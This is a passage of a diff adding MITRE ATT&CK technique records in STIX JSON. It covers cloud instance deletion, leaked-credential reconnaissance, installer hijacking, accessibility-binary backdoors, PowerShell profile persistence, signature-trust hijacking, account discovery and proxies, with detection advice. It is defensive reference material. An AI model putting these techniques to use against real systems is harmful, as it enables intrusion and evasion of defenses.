evade detection and remove evidence of their presence. Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.\n\nAn adversary may also [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and later terminate the instance after achieving their objectives.(Citation: Mandiant M-Trends 2020)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "The deletion of a new instance or virtual machine is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, detecting a sequence of events such as the creation of an instance, mounting of a snapshot to that instance, and deletion of that instance by a new user account may indicate suspicious activity.\n\nIn AWS, CloudTrail logs capture the deletion of an instance in the TerminateInstances event, and in Azure the deletion of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances delete to delete a VM.(Citation: Cloud Audit Logs)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "IaaS" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4", + "created": "2020-06-16T17:23:06.508Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1578/003", + "external_id": "T1578.003" + }, + { + "source_name": "Mandiant M-Trends 2020", + "description": "Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020.", + "url": "https://content.fireeye.com/m-trends/rpt-m-trends-2020" + }, + { + "source_name": "AWS CloudTrail Search", + "description": "Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances. Retrieved June 17, 2020.", + "url": "https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/" + }, + { + "source_name": "Azure Activity Logs", + "description": "Microsoft. (n.d.). View Azure activity logs. Retrieved June 17, 2020.", + "url": "https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs" + }, + { + "source_name": "Cloud Audit Logs", + "description": "Google. (n.d.). Audit Logs. Retrieved June 1, 2020.", + "url": "https://cloud.google.com/logging/docs/audit#admin-activity" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-26T18:01:20.520Z", + "name": "Code Repositories", + "description": "Adversaries may search public code repositories for information about victims that can be used during targeting. Victims may store code in repositories on various third-party websites such as GitHub, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git. \n\nAdversaries may search various public code repositories for various information about a victim. Public code repositories can often be a source of various general information about victims, such as commonly used programming languages and libraries as well as the names of employees. Adversaries may also identify more sensitive data, including accidentally leaked credentials or API keys.(Citation: GitHub Cloud Service Credentials) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Valid Accounts](https://attack.mitre.org/techniques/T1078) or [Phishing](https://attack.mitre.org/techniques/T1566)). \n\n**Note:** This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1213/003), which focuses on [Collection](https://attack.mitre.org/tactics/TA0009) from private and internally hosted code repositories. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_attack_spec_version": "3.0.0", + "x_mitre_contributors": [ + "Matt Burrough, @mattburrough, Microsoft", + "Vinayak Wadhwa, SAFE Security" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. \n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--70910fbd-58dc-4c1c-8c48-814d11fcd022", + "created": "2022-08-09T13:01:43.314Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1593/003", + "external_id": "T1593.003" + }, + { + "source_name": "GitHub Cloud Service Credentials", + "description": "Runa A. Sandvik. (2014, January 14). Attackers Scrape GitHub For Cloud Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved August 9, 2022.", + "url": "https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2020-10-27T14:49:39.188Z", + "name": "Executable Installer File Permissions Weakness", + "description": "Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.\n\nAnother variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the %TEMP% directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).\n\nAdversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012) (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Travis Smith, Tripwire", + "Stefan Kanthak" + ], + "x_mitre_detection": "Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.\n\nLook for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_effective_permissions": [ + "Administrator", + "User", + "SYSTEM" + ], + "x_mitre_permissions_required": [ + "Administrator", + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--70d81154-b187-45f9-8ec5-295d01255979", + "created": "2020-03-13T11:12:18.558Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1574/005", + "external_id": "T1574.005" + }, + { + "source_name": "mozilla_sec_adv_2012", + "description": "Robert Kugler. (2012, November 20). Mozilla Foundation Security Advisory 2012-98. Retrieved March 10, 2017.", + "url": "https://www.mozilla.org/en-US/security/advisories/mfsa2012-98/" + }, + { + "source_name": "Executable Installers are Vulnerable", + "description": "Stefan Kanthak. (2015, December 8). Executable installers are vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation of privilege. Retrieved December 4, 2014.", + "url": "https://seclists.org/fulldisclosure/2015/Dec/34" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Accessibility Features", + "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.\n\nTwo common accessibility programs are C:\\Windows\\System32\\sethc.exe, launched when the shift key is pressed five times and C:\\Windows\\System32\\utilman.exe, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as \"sticky keys\", and has been used by adversaries for unauthenticated access through a remote desktop login screen. (Citation: FireEye Hikit Rootkit)\n\nDepending on the version of Windows, an adversary may take advantage of these features in different ways. Common methods used by adversaries include replacing accessibility feature binaries or pointers/references to these binaries in the Registry. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in %systemdir%\\, and it must be protected by Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012) debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced.\n\nFor simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., C:\\Windows\\System32\\utilman.exe) may be replaced with \"cmd.exe\" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014)\n\nOther accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)(Citation: Narrator Accessibility Abuse)\n\n* On-Screen Keyboard: C:\\Windows\\System32\\osk.exe\n* Magnifier: C:\\Windows\\System32\\Magnify.exe\n* Narrator: C:\\Windows\\System32\\Narrator.exe\n* Display Switcher: C:\\Windows\\System32\\DisplaySwitch.exe\n* App Switcher: C:\\Windows\\System32\\AtBroker.exe", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Paul Speulstra, AECOM Global Security Operations Center" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Changes to accessibility utility binaries or binary paths that do not correlate with known software, patch cycles, etc., are suspicious. Command line invocation of tools capable of modifying the Registry for associated keys are also suspicious. Utility arguments and the binaries themselves should be monitored for changes. Monitor Registry keys within HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_effective_permissions": [ + "SYSTEM" + ], + "x_mitre_permissions_required": [ + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--70e52b04-2a0c-4cea-9d18-7149f1df9dc5", + "created": "2020-01-24T14:32:40.315Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1546/008", + "external_id": "T1546.008" + }, + { + "source_name": "Narrator Accessibility Abuse", + "description": "Comi, G. (2019, October 19). Abusing Windows 10 Narrator's 'Feedback-Hub' URI for Fileless Persistence. Retrieved April 28, 2020.", + "url": "https://giuliocomi.blogspot.com/2019/10/abusing-windows-10-narrators-feedback.html" + }, + { + "source_name": "FireEye Hikit Rootkit", + "description": "Glyer, C., Kazanciyan, R. (2012, August 20). The “Hikit” Rootkit: Advanced and Persistent Attack Techniques (Part 1). Retrieved June 6, 2016.", + "url": "https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html" + }, + { + "source_name": "DEFCON2016 Sticky Keys", + "description": "Maldonado, D., McGuffin, T. (2016, August 6). Sticky Keys to the Kingdom. Retrieved July 5, 2017.", + "url": "https://www.slideshare.net/DennisMaldonado5/sticky-keys-to-the-kingdom" + }, + { + "source_name": "Tilbury 2014", + "description": "Tilbury, C. (2014, August 28). Registry Analysis with CrowdResponse. Retrieved November 12, 2014.", + "url": "http://blog.crowdstrike.com/registry-analysis-with-crowdresponse/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "PowerShell Profile", + "description": "Adversaries may gain persistence and elevate privileges in certain situations by abusing [PowerShell](https://attack.mitre.org/techniques/T1086) profiles. A PowerShell profile (profile.ps1) is a script that runs when PowerShell starts and can be used as a logon script to customize user environments. PowerShell supports several profiles depending on the user or host program. For example, there can be different profiles for PowerShell host programs such as the PowerShell console, PowerShell ISE or Visual Studio Code. An administrator can also configure a profile that applies to all users and host programs on the local computer. (Citation: Microsoft About Profiles) \n\nAdversaries may modify these profiles to include arbitrary commands, functions, modules, and/or PowerShell drives to gain persistence. Every time a user opens a PowerShell session the modified script will be executed unless the -NoProfile flag is used when it is launched. (Citation: ESET Turla PowerShell May 2019) \n\nAn adversary may also be able to escalate privileges if a script in a PowerShell profile is loaded and executed by an account with higher privileges, such as a domain administrator. (Citation: Wits End and Shady PowerShell Profiles)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Allen DeRyke, ICE" + ], + "x_mitre_detection": "Locations where profile.ps1 can be stored should be monitored for new profiles or modifications. (Citation: Malware Archaeology PowerShell Cheat Sheet) Example profile locations include:\n\n* $PsHome\\Profile.ps1\n* $PsHome\\Microsoft.{HostProgram}_profile.ps1\n* $Home\\My Documents\\PowerShell\\Profile.ps1\n* $Home\\My Documents\\PowerShell\\Microsoft.{HostProgram}_profile.ps1\n\nMonitor abnormal PowerShell commands, unusual loading of PowerShell drives or modules, and/or execution of unknown programs.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User", + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--723e3a2b-ca0d-4daa-ada8-82ea35d3733a", + "created": "2019-06-14T18:53:49.472Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1504", + "external_id": "T1504" + }, + { + "source_name": "Microsoft About Profiles", + "description": "Microsoft. (2017, November 29). About Profiles. Retrieved June 14, 2019.", + "url": "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-6" + }, + { + "source_name": "ESET Turla PowerShell May 2019", + "description": "Faou, M. and Dumont R.. (2019, May 29). A dive into Turla PowerShell usage. Retrieved June 14, 2019.", + "url": "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/" + }, + { + "source_name": "Wits End and Shady PowerShell Profiles", + "description": "DeRyke, A.. (2019, June 7). Lab Notes: Persistence and Privilege Elevation using the Powershell Profile. Retrieved July 8, 2019.", + "url": "https://witsendandshady.blogspot.com/2019/06/lab-notes-persistence-and-privilege.html" + }, + { + "source_name": "Malware Archaeology PowerShell Cheat Sheet", + "description": "Malware Archaeology. (2016, June). WINDOWS POWERSHELL LOGGING CHEAT SHEET - Win 7/Win 2008 or later. Retrieved June 24, 2016.", + "url": "http://www.malwarearchaeology.com/s/Windows-PowerShell-Logging-Cheat-Sheet-ver-June-2016-v2.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "SIP and Trust Provider Hijacking", + "description": "In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017)\n\nBecause of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) (Citation: EduardosBlog SIPs July 2008) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all (Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified by globally unique identifiers (GUIDs). (Citation: SpectorOps Subverting Trust Sept 2017)\n\nSimilar to [Code Signing](https://attack.mitre.org/techniques/T1116), adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and whitelisting tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017)\n\n* Modifying the Dll and FuncName Registry values in HKLM\\SOFTWARE[\\WOW6432Node\\]Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllGetSignedDataMsg\\{SIP_GUID} that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value to all files using that SIP (Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).\n* Modifying the Dll and FuncName Registry values in HKLM\\SOFTWARE\\[WOW6432Node\\]Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{SIP_GUID} that point to the DLL providing a SIP’s CryptSIPDllVerifyIndirectData function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP (Citation: GitHub SIP POC Sept 2017) (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.\n* Modifying the DLL and Function Registry values in HKLM\\SOFTWARE\\[WOW6432Node\\]Microsoft\\Cryptography\\Providers\\Trust\\FinalPolicy\\{trust provider GUID} that point to the DLL providing a trust provider’s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP’s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).\n* **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038).\n\nHijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Matt Graeber, @mattifestation, SpecterOps" + ], + "x_mitre_detection": "Periodically baseline registered SIPs and trust providers (Registry entries and files on disk), specifically looking for new, modified, or non-Microsoft entries. (Citation: SpectorOps Subverting Trust Sept 2017)\n\nEnable CryptoAPI v2 (CAPI) event logging (Citation: Entrust Enable CAPI2 Aug 2017) to monitor and analyze error events related to failed trust validation (Event ID 81, though this event can be subverted by hijacked trust provider components) as well as any other provided information events (ex: successful validations). Code Integrity event logging may also provide valuable indicators of malicious SIP or trust provider loads, since protected processes that attempt to load a maliciously-crafted trust validation component will likely fail (Event ID 3033). (Citation: SpectorOps Subverting Trust Sept 2017)\n\nUtilize Sysmon detection rules and/or enable the Registry (Global Object Access Auditing) (Citation: Microsoft Registry Auditing Aug 2016) setting in the Advanced Security Audit policy to apply a global system access control list (SACL) and event auditing on modifications to Registry values (sub)keys related to SIPs and trust providers: (Citation: Microsoft Audit Registry July 2012)\n\n* HKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID\n* HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\n* HKLM\\SOFTWARE\\Microsoft\\Cryptography\\Providers\\Trust\n* HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\Providers\\Trust\n\n**Note:** As part of this technique, adversaries may attempt to manually edit these Registry keys (ex: Regedit) or utilize the legitimate registration process using [Regsvr32](https://attack.mitre.org/techniques/T1117). (Citation: SpectorOps Subverting Trust Sept 2017)\n\nAnalyze Autoruns data for oddities and anomalies, specifically malicious files attempting persistent execution by hiding within auto-starting locations. Autoruns will hide entries signed by Microsoft or Windows by default, so ensure “Hide Microsoft Entries” and “Hide Windows Entries” are both deselected. (Citation: SpectorOps Subverting Trust Sept 2017)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Application whitelisting", + "Autoruns Analysis", + "Digital Certificate Validation", + "Process whitelisting", + "User Mode Signature Validation" + ], + "x_mitre_permissions_required": [ + "Administrator", + "SYSTEM" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--72b5ef57-325c-411b-93ca-a3ca6fa17e31", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1198", + "external_id": "T1198" + }, + { + "source_name": "Microsoft Authenticode", + "description": "Microsoft. (n.d.). Authenticode. Retrieved January 31, 2018.", + "url": "https://msdn.microsoft.com/library/ms537359.aspx" + }, + { + "source_name": "Microsoft WinVerifyTrust", + "description": "Microsoft. (n.d.). WinVerifyTrust function. Retrieved January 31, 2018.", + "url": "https://msdn.microsoft.com/library/windows/desktop/aa388208.aspx" + }, + { + "source_name": "SpectorOps Subverting Trust Sept 2017", + "description": "Graeber, M. (2017, September). Subverting Trust in Windows. Retrieved January 31, 2018.", + "url": "https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf" + }, + { + "source_name": "EduardosBlog SIPs July 2008", + "description": "Navarro, E. (2008, July 11). SIP’s (Subject Interface Package) and Authenticode. Retrieved January 31, 2018.", + "url": "https://blogs.technet.microsoft.com/eduardonavarro/2008/07/11/sips-subject-interface-package-and-authenticode/" + }, + { + "source_name": "Microsoft Catalog Files and Signatures April 2017", + "description": "Hudek, T. (2017, April 20). Catalog Files and Digital Signatures. Retrieved January 31, 2018.", + "url": "https://docs.microsoft.com/windows-hardware/drivers/install/catalog-files" + }, + { + "source_name": "GitHub SIP POC Sept 2017", + "description": "Graeber, M. (2017, September 14). PoCSubjectInterfacePackage. Retrieved January 31, 2018.", + "url": "https://github.com/mattifestation/PoCSubjectInterfacePackage" + }, + { + "source_name": "Entrust Enable CAPI2 Aug 2017", + "description": "Entrust Datacard. (2017, August 16). How do I enable CAPI 2.0 logging in Windows Vista, Windows 7 and Windows 2008 Server?. Retrieved January 31, 2018.", + "url": "http://www.entrust.net/knowledge-base/technote.cfm?tn=8165" + }, + { + "source_name": "Microsoft Registry Auditing Aug 2016", + "description": "Microsoft. (2016, August 31). Registry (Global Object Access Auditing). Retrieved January 31, 2018.", + "url": "https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn311461(v=ws.11)" + }, + { + "source_name": "Microsoft Audit Registry July 2012", + "description": "Microsoft. (2012, July 2). Audit Registry. Retrieved January 31, 2018.", + "url": "https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/dd941614(v=ws.10)" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-01-12T23:36:56.245Z", + "name": "Account Discovery", + "description": "Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., [Valid Accounts](https://attack.mitre.org/techniques/T1078)).\n\nAdversaries may use several methods to enumerate accounts, including abuse of existing tools, built-in commands, and potential misconfigurations that leak account names and roles or permissions in the targeted environment.\n\nFor examples, cloud environments typically provide easily accessible interfaces to obtain user lists.(Citation: AWS List Users)(Citation: Google Cloud - IAM Servie Accounts List API) On hosts, adversaries can use default [PowerShell](https://attack.mitre.org/techniques/T1059/001) and other command line functionality to identify accounts. Information about email addresses and accounts may also be extracted by searching an infected system’s files.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Daniel Stepanic, Elastic", + "Microsoft Threat Intelligence Center (MSTIC)", + "Travis Smith, Tripwire" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nMonitor for processes that can be used to enumerate user accounts, such as net.exe and net1.exe, especially when executed in quick succession.(Citation: Elastic - Koadiac Detection with EQL)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Azure AD", + "Office 365", + "SaaS", + "IaaS", + "Linux", + "macOS", + "Google Workspace" + ], + "x_mitre_version": "2.4", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "created": "2017-05-31T21:31:06.988Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1087", + "external_id": "T1087" + }, + { + "source_name": "AWS List Users", + "description": "Amazon. (n.d.). List Users. Retrieved August 11, 2020.", + "url": "https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html" + }, + { + "source_name": "Google Cloud - IAM Servie Accounts List API", + "description": "Google. (2020, June 23). gcloud iam service-accounts list. Retrieved August 4, 2020.", + "url": "https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list" + }, + { + "source_name": "Elastic - Koadiac Detection with EQL", + "description": "Stepanic, D.. (2020, January 13). Embracing offensive tooling: Building detections against Koadic using EQL. Retrieved November 30, 2020.", + "url": "https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Proxy", + "description": "Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.\n\nAdversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + 